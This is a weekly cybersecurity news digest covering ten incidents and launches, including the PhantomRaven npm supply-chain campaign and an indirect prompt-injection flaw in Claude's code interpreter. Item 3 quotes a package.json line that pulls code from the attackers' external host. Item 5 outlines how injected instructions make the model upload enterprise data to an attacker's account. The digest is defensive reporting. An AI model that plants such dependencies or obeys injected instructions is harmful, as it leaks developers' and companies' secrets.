Interesting Cybersecurity News of the Week Summarised – 2025-11-03

This weeks news made me think that maybe in our vendor review policies we shouldn’t only be happy when a company has chosen to have a nice bugy boundy on HackerOne or elsewhere but we should also pay a bit of attention to the policy that bounty program has and would things that we would consider serious violations get accepted or rejected in the program? I am not sure Anthropics program would pass my review today. Read item 5 to understand why.

1. UNC6384 Exploits Unpatched Windows LNK Flaw to Deploy PlugX Against European Diplomats

Between September and October 2025, the China-affiliated group UNC6384 sent spear-phishing emails to European diplomatic and government entities, exploiting the unpatched Windows shortcut vulnerability CVE-2025-9491/ZDI-CAN-25373. Malicious LNK files triggered a multi-stage chain—using a decoy PDF, PowerShell scripts, DLL side-loading of a Canon utility, and an encrypted PlugX payload to establish persistent remote access. 

Key Details

• Targets: diplomatic organizations in Hungary, Belgium, Italy, the Netherlands; government agencies in Serbia.
• Attack chain: spear-phishing URL → LNK file → PowerShell unpacks TAR (Canon utility + malicious DLL + encrypted PlugX).
• PlugX RAT capabilities: command execution, keylogging, file transfer, persistence via registry Run keys.

Next Steps

• Block or disable .LNK file execution in Windows Explorer via Group Policy.
• Deploy application control to restrict PowerShell scripts on endpoints.
• Scan for Canon printer utilities (e.g., cnmpaui.exe) and CanonStager DLLs in endpoint logs.

Read more at The Hacker News

2. US Telecom Company Ribbon Communications Reveals Year-Long Nation-State Breach

Ribbon Communications disclosed that suspected nation-state hackers infiltrated its network as early as December 2024, remaining undetected until September 2025. There is no evidence of material data exfiltration.

Key Details

• Initial access may date back to December 2024; discovery occurred in early September 2025.
• Attackers reportedly accessed customer files on two laptops; three smaller customers notified.
• No evidence yet of material data theft; investigation involves federal law enforcement and third-party experts.
• Ribbon’s technology underpins major carriers (Verizon, CenturyLink, BT) and critical infrastructure (U.S. DoD).

Read more at Dark Reading

3. PhantomRaven Campaign Uses Invisible Remote Dependencies to Harvest Developer Credentials

Security researchers uncovered a supply chain campaign named PhantomRaven that has embedded Remote Dynamic Dependencies into 126 npm packages since August 2025, amassing over 86,000 downloads and exfiltrating developer tokens and CI/CD secrets. The hidden HTTP-based dependencies evade static scanning, posing significant risk to development environments and CI pipelines.

Key Details

• 126 malicious packages with zero declared dependencies fetched external payloads
• Over 86,000 downloads between August and October 2025
• Regular dependencies look something like this in the package.json file:

"dependencies": {
    "express": "^4.18.0"
}

• But npm also supports something most developers never use – HTTP URLs as dependency specifiers that bypass registry and scanner visibility. When you install a package with this kind of dependency, npm fetches it from that external URL. Not from npmjs.com. From wherever the attacker wants. [Koi Security Blog]

"dependencies": {
    "ui-styles-pkg": "http://packages.storeartifact.com/npm/unused-imports"
}

• Campaign leveraged AI “slopsquatting” to propose plausible fake package names

Next Steps

• Audit package.json for HTTP URL dependencies
• Monitor outbound calls during npm install processes
• Enforce policies to block non-registry dependency URLs

Read more at Koi Security Blog, Cybersecurity News

4. OpenAI launches Aardvark GPT-5 agent for automated code vulnerability discovery and patching

Aardvark embeds into CI/CD pipelines to continuously scan code with GPT-5 reasoning, validate exploitability in sandboxes, and propose Codex-generated patches for human review.  

Key Details

• Private beta since late October, deployed internally and with alpha partners
• Achieved 92% recall on known and synthetic vulnerabilities in benchmark tests
• Has surfaced 10 CVEs in open-source projects; pro-bono scanning for select noncommercial repos
• Builds contextual threat models, runs sandbox exploits, then uses Codex to draft fixes

Read more at OpenAI, The Hacker News

5. Vulnerability in Claude AI Code Interpreter Allows Silent Enterprise Data Exfiltration

A flaw in Anthropic’s Claude AI lets attackers use indirect prompt injection to exfiltrate enterprise data by uploading files through the platform’s own API infrastructure using attacker-controlled keys. Default network restrictions ("Package managers only") fail to block this channel, leaving sensitive chat logs, documents, and integrated service data at risk without obvious indicators.

Key Details

• Attack chain: Insert malicious instructions into something the LLM is reading –> use the Anthropic FIle API that can’t be disabled to exfiltrate data to the attackers Anthropic account.
• Exfiltration volume: up to 30 MB per file, unlimited files via Anthropic’s Files API.
• Attack leverages default egress to api.anthropic.com, allowed alongside npm and PyPI.
• Bypasses safety filters by embedding benign code (e.g., print statements) alongside payloads.
• Entry points include user-uploaded docs, websites for summarization, MCP servers, and Google Drive.
• Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025. The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.

Next Steps

• Enforce custom allow-lists excluding api.anthropic.com and monitor file-upload API calls.

Read more at CSO Online

6. Atroposia RAT-as-a-Service Lowers Barrier for Enterprise Attacks for just $200/month

Researchers at Varonis have identified a new malware-as-a-service toolkit, dubbed Atroposia, that for $200 per month offers remote access, stealthy shadow RDP sessions, credential theft, DNS hijacking and an integrated vulnerability scanner.  By automating reconnaissance, persistence and exfiltration in a single, low-skill platform, Atroposia compresses the traditional attack chain and significantly raises the stakes for enterprise defenders.

Key Details

• Subscription pricing starts at $200/month, $900 for six months.
• HRDP Connect module spawns invisible remote desktop sessions.
• Built-in scanner reports missing patches, unsafe settings and outdated software.
• Encrypted C2 channels, UAC bypass persistence and clipboard monitoring.

Read more at CSO Online, Varonis

7. Brash Exploit Crashes Chromium-Based Browsers via Unbounded document.title Updates

A critical flaw in Chromium’s Blink engine lets attackers crash Chrome, Edge, Brave and other Chromium browsers in 15–60 seconds by flooding document.title updates.

This makes it trivial to launch widespread denial-of-service attacks against everyday web users, but also presents serious risks to businesses that rely on web-based dashboards and headless browsers. 

For example, a single malicious link could silently crash a fleet of headless Chrome instances used by AI agents for market research, bring down a surgeon’s browser-based navigation system mid-procedure, or paralyze online trading desks at the opening bell. 

Because the exploit can be delayed or scheduled, attackers could time it to coincide with high-stakes events—such as peak e-commerce transactions or financial market openings—multiplying the potential damage.

Key Details

• Affects all Chromium versions on Windows, macOS, Linux and Android.
• Exploit phases: pre-generate 512-char hex seeds, inject bursts (≈24 million title updates/sec), saturate UI thread.
• Immune: Firefox, Safari (WebKit/Gecko engines) and all iOS browsers (WebKit-mandated).

Read more at The Hacker News, CSO Online, Cybersecurity News

8. 500 GB of Great Firewall Infrastructure Data Exposed in Historic Breach

In September 2025, over 500 GB of internal documentation from China’s Great Firewall was leaked, revealing source code, configuration files, traffic logs, and packet captures that outline the censorship system’s architecture and enforcement rules. Embedded metadata links files to individual operators and network components, offering researchers and threat actors a detailed blueprint to identify vulnerabilities and develop evasion techniques.

Key Details

• Leak contains 100,000+ files: source code, runbooks, Visio diagrams, PCAPs.
• Cross-border traffic logs reveal policy propagation delays and unfiltered sessions.
• Metadata exposes usernames, hosts, revision histories tied to telco and government teams.
• Includes VPN IP lists, DNS query patterns, and SSL certificate fingerprints.

Read more at Cybersecurity News

9. Swedish Power Grid Operator Confirms Data Breach, Everest Ransomware Gang Claims 280 GB Theft

Svenska kraftnät has confirmed unauthorized access to a “limited external file transfer solution” after the Everest ransomware gang claimed to have exfiltrated roughly 280 GB of internal data. The breach did not disrupt Sweden’s power supply, but sensitive schematics and employee information may be at risk. The operator is working with police and national cybersecurity authorities to assess exposure and contain the incident.

Key Details

• The incident was first disclosed on October 26, 2025, via Svenska kraftnät’s press release.
• Everest posted on its leak site claiming responsibility and threatened to publish data if demands aren’t met.
• Operational technology and the national electricity transmission network remain unaffected.

Read more at Svenska kraftnät, Everest Ransom_DB on X, The Record

10. Aembit Introduces Identity and Access Management for Agentic AI

Aembit has extended its Workload IAM platform with Blended Identity and an MCP Identity Gateway to assign unique, cryptographically verified identities to autonomous AI agents, enforce least-privilege access at runtime, and record every access decision. This addresses the lack of tailored access controls for self-driven AI in hybrid environments, enabling security teams to maintain auditability, revoke permissions immediately, and close the gap between AI adoption and secure governance.

Key Details

• Blended Identity ties each AI agent’s actions to a verified human context for traceable operations.
• MCP Identity Gateway uses the Model Context Protocol to authenticate agents and enforce policies in real time.
• Ephemeral credentials are issued just in time, with full structured event logging for compliance.
• Supports cloud, on-premises, and SaaS environments under a centralized policy control plane.

Read more at CSO Online, HackRead

Subscribe

Subscribe to receive this weekly cybersecurity news summary to your inbox every Monday.